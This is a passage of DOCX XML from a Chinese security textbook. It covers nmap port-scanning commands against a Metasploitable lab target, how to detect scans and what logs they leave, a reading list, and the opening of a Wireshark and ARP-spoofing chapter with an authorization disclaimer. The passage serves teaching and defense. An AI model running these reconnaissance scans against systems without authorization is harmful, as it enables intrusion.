          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全连接扫描：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本探测扫描：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作要求：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在每次扫描前，先预估不同扫描类型可能产生的网络连接数和日志痕迹，尤其留意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP 22、80、3306 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP 137、161 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的表现。扫描后，登录靶机（若靶机允许）检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/syslog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或相关应用日志，验证哪些扫描留下了记录，哪些几乎没有痕迹。记录实验中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描完成时间与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移思考：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果目标防火墙启用了“静默丢弃”策略，上述扫描结果会如何变化？如何通过组合使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（跳过主机发现）和自定义端口范围来应对？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="106" w:name="小结-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描检测的核心思路是监视短时间窗口内一个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对多端口或跨主机的超常探测行为，统计模型与签名规则相辅相成。Snort/Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可直接使用内置扫描规则，但需根据真实网络流量基线调整阈值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙默认拒绝策略（不返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST）能够显著隐藏主机及端口状态，增加扫描意图判别的难度；SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则从协议栈层面消除了扫描消耗内存资源的影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蜜罐和欺骗防御可将攻击者引入虚假资产区，延缓其对真实目标的映射，同时蓝队可借此捕获攻击者工具和行为特征，实现主动防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描因不完成连接而提升隐蔽性，但其仍是可检测的；UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描因协议无状态及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限速而缓慢且易产生误报，两者在授权渗透测试中需根据场景选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者应将扫描检测作为早期预警信号，联动防火墙或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行限速或临时阻断，但必须区分正常管理流量，避免误拦造成生产事故。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描与反扫描是持续的攻防博弈：攻击者会调整探测速率和报文指纹以规避检测，防御者则通过多层检测与主动欺骗保持对感知链条的控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="延伸阅读白名单-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lyon, G. 《Nmap Network Scanning》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作者亲著的官方手册，除详细解释扫描技术外，也涵盖扫描检测与躲避思路，是本章内容最直接的延伸读物。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanders, C. 《Practical Packet Analysis》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为核心工具讲解网络包分析方法，有助于理解扫描报文在协议层面的具体指纹，以及蓝队如何基于抓包开发自定义检测规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bejtlich, R. 《The Practice of Network Security Monitoring》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：讲解网络监测的实战哲学，从数据采集到分析研判，对建设基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的扫描检测体系极具启发意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档与社区规则集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：作为最广泛部署的开源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS，Snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的扫描检测规则库是入门理解签名检测的良好素材，可查阅其规则示例以加深对扫描特征的认识。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：信息收集与扫描章节对授权测试的操作流程进行了规范，帮助读者在合法框架下运用本章所述扫描技术。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="119" w:name="流量分析与中间人wireshark-与-arp-欺骗"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量分析与中间人:Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="109" w:name="wireshark-流量分析看懂线缆上的包"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量分析:看懂线缆上的包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节聚焦网络数据包捕获与分析的核心工具</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及其命令行对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在进入中间人攻击之前，必须先具备“看懂线缆上的包”的能力——这是在二层进行流量嗅探和劫持的基础。防御者同样依赖于这种可见性来检测异常。因此，本节从被动抓包的原理出发，结合过滤与分析技巧，最终揭示明文协议凭据泄露的严重性，为下一节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与加密降级攻击提供前置动机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》网络卷（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）已讲授以太网帧结构、MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址与交换机工作原理；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章已讲授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与三次握手；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章已讲授防火墙、ACL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS/SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基本原理。本节直接使用这些概念，不再重讲协议细节。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场环境依赖：需已完成本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的基础靶场搭建，拥有至少两台互相可达的实验虚拟机或容器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable、Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux），且实验网络与生产网络及公网完全隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">法律与伦理红线</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限读者在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自有隔离实验室</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方授权靶机平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的镜像）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">获得书面授权的系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上执行。实验网络必须与生产网络及互联网物理或逻辑隔离。未经授权抓取、截获他人网络通信属严重违法行为，可能构成《刑法》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 285 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 286 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条规定的非法获取计算机信息系统数据罪或破坏计算机信息系统罪。本书不对任何滥用行为承担责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机：攻击者与防御者的共同之眼</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角：在渗透的侦察与横向移动阶段，攻击者渴望看到网络内部流动的明文信息——登录凭据、会话令牌、未加密的配置文件、内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用。只要能够将网卡置于“混杂模式”或通过中间人手段将流量引向自己，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就能将这些信息尽收眼底。这往往是攻击者从“网络接入”升级到“获得有效凭据”的最短路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角：网络管理员和安全分析师依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行故障排查与威胁狩猎。通过捕获异常流量、跟踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流、分析重传和延迟，可以定位网络瓶颈、发现恶意信标、还原攻击链。因此，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">既是攻击者的窃听器，也是蓝队的显微镜。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：网卡、混杂模式与“看到什么”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常情况下，以太网卡只接收目的地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址为自己、广播地址或多播组地址的帧，其余帧被硬件直接丢弃。这保证了主机在共享介质中的“隐私”。但若要“看所有能听见的东西”，可以将网卡设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">混杂模式（promiscuous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mode）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
